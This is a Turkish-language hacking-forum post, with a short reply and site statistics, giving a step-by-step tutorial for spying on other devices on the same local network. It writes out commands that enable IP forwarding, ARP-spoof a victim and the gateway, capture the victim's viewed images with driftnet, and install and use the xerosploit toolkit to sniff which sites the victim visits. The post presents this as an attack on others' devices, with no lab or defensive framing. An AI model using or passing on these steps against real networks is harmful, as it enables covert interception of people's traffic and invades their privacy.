Aynı Networkdeki Cihazlara Sızma [VİP]

Anarchosa&ByR0L3S4 İlk olarak netdiscover yazarak ağdaki cihazların ip adreslerini alıyoru . 192.168.84.130 diyelim çıkan cihazlardan bir tanesi ip adresini kopyalıyoruz bu...

Anarchosa&ByR0L3S4
İlk olarak
Kod:
netdiscover
yazarak ağdaki cihazların ip adreslerini alıyoru .
192.168.84.130 diyelim çıkan cihazlardan bir tanesi ip adresini kopyalıyoruz
bu arada ben wiriles değil kablo ile bağlandığımdan dolayı bu şekilde anlatcağım siz kendinize göre editlersiniz .

Kod:
echo 1 > /proc/sys/net/ipv4/ip_forward
Kod:
arpspoof -i eth0 -t 192.168.84.130 192.168.84.1
Yeni bir terminal açıyoruz .
Kod:
arpspoof -i eth0 -t 192.168.84.1 192.168.84.130
Kod:
drifnet -i  eth0

Evet ip adresini aldığımız cihaz hangi siteye girerse o sitedeki veriler bize gelcek png formatında .

2.olarak başka bir py uzantılı dosyamız ile sisteme girmeye çalışcağız
Kod:
git clone https://github.com/LionSec/xerosploit.git
ve dosyamızın içerisine giriş yapıyoruz orda python dili ile yazılmış .py uzantılı install adında kurulum dosyası var .
bu dosyayı
Kod:
python install.py
yada
Kod:
chmod +x install.py
sonra
Kod:
./install.py
olarak çalıştıroyurz bize kali ubuntu yada parrot diye 2 seçenek sunuyor ben parrot os kullandığımdan dolayı 2 yani parrotu seçiyorum
Kod:
xerosploit
yazarak giriş yapıyoruz .

Kod:
help
yazarak modül seçeneklerimizi görüyoruz scan yapıp taratıyoruz networkümüzü

karşımıza ağımıza bağlı olanların ip adresleri geldi bunlardan saldırı yapcağımızı seçiyoruz ve kopyalıyoruz
ve yapıştırıyoruz sonra entera tıklıyoruz karşımıza saldırı türleri geldi . Ben sniff seçiyorum çünkü cihazın hangi sitelere girdiğini görmek istiyorum
Kod:
sniff
yazıyorum ve enterliyorum gelen seçenekten Y yi seçiyorum ve enterliyorum ve karşıma istediğim şey geldi :)

Moderatörün son düzenlenenleri:
Ellerine sağlık aşkm
Edit: şu face ip sorunu hallolsun buna detaylı bakıcam sormam gerekenler var çee

131,844Konular
3,271,969Mesajlar
316,382Kullanıcılar
guven1938Son Üye
Üst Alt